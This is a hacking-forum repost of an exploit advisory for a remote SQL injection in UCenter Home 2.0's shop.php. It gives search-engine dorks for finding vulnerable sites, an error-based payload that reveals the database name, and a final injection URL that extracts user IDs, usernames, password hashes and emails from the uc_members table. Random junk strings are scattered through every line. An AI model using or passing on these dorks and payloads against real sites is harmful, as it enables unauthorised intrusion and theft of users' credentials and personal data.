找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2010|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
0 {  P% i9 n" G" D" ~! e; y
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
" b" T3 O6 B+ ]0 Q+ ?. @2 p
* i$ |  D+ ~/ E/ y6 \; P                                 
6 R. [! A6 K7 C) J6 |' s0 A" X
1 g2 g8 Q" q  y: a! x5 H2 {0 @*/ Author : KnocKout  3 x7 a( h' P" b

+ h, w( F" ?. c/ E8 O3 }*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
# B8 g/ z( Y2 q6 p6 @. J
9 y0 t; n; y/ X/ K" b*/ Contact: knockoutr@msn.com  
+ q/ P" G0 b8 C; I+ G
& I4 i) }8 A. R1 p' D/ N*/ Cyber-Warrior.org/CWKnocKout  
6 `$ q  F4 G7 g
) h* k$ w  M, \$ {6 Q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
1 Q) `' z% H( l& h. ]. k; ]- {5 `5 j$ D
Script : UCenter Home  
7 n5 j- w+ {+ S2 s& m
  E4 ]# n1 Z+ K% k* K% HVersion : 2.0  
* n0 a, ]. B+ J5 t" E9 y5 r1 v1 i2 G3 k) M7 v
Script HomePage : http://u.discuz.net/  # x9 y* q3 v4 c: [% k  a" T
. J3 G9 n/ U9 Z* E* g2 V8 d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  6 ]) e9 V' f: i) _' J
- K6 M, x# u3 j, ^, V
Dork : Powered by UCenter inurl:shop.php?ac=view  
  y0 ^& L  X+ S; {% O
# {' V5 ~! @% xDork 2 : inurl:shop.php?ac=view&shopid=  0 g1 t0 u; n' w, T: Z- ?  j
7 p/ V4 N5 `) f& F: q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
  W$ X4 Y- e7 @2 U/ _
# I' R5 c! B4 I: z3 QVuln file : Shop.php  
$ k1 ^- M* c, ?9 M* _- i0 a% d0 X9 b
( _) b2 @( G$ b" V0 ~8 A6 c2 Ovalue's : (?)ac=view&shopid=  0 q- w& Z( y+ @- e4 }( @6 [* b

  q. y) H3 @4 i: G5 ~5 ^Vulnerable Style : SQL Injection (MySQL Error Based)  
: g7 c. y. f2 n+ _" h! o2 l, u' R( D2 b0 G
Need Metarials : Hex Conversion  $ r$ b; p: x. ~- R8 [5 p+ m

+ ?6 x3 ~3 \9 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
) [/ P6 D  \0 H. |/ o7 H7 s5 L8 @, c: d$ [/ `0 T+ b
Your Need victim Database name.   
. k. V, l+ e( s) F: b/ V% T3 H- S+ d& [# |  |
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  6 }- J0 H# O  K$ ^

/ l8 z. E" f* P9 e- Y..  
( \! V, {4 `+ u: o* g8 @: w
9 \  `4 }- L, T, @& Y+ w  JDB : Okey.  % l9 r% [; F: z9 m# z

; j! p+ u5 K: G' Tyour edit DB `[TARGET DB NAME]`  
8 u1 v$ |9 i) W9 Y
  D& `" W+ U9 U8 lExample : 'hiwir1_ucenter'  
* l2 f0 _$ f& e! Z
+ p# D' \% M! {' W( i! b& C9 a' E  FEdit : Okey.  
! K/ J- U0 e1 N  N1 S  e0 M" `5 [8 N7 d, j' l3 B0 T& M7 w) _
Your use Hex conversion. And edit Your SQL Injection Exploit..  
+ ^6 C3 t8 ^; C+ C0 m5 L( j% w" x9 X/ \) g
   8 i" y. q0 N. o

$ w; z0 D2 Z+ C, F: M* OExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
! c6 t/ F, u* j' k0 _- z9 F
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表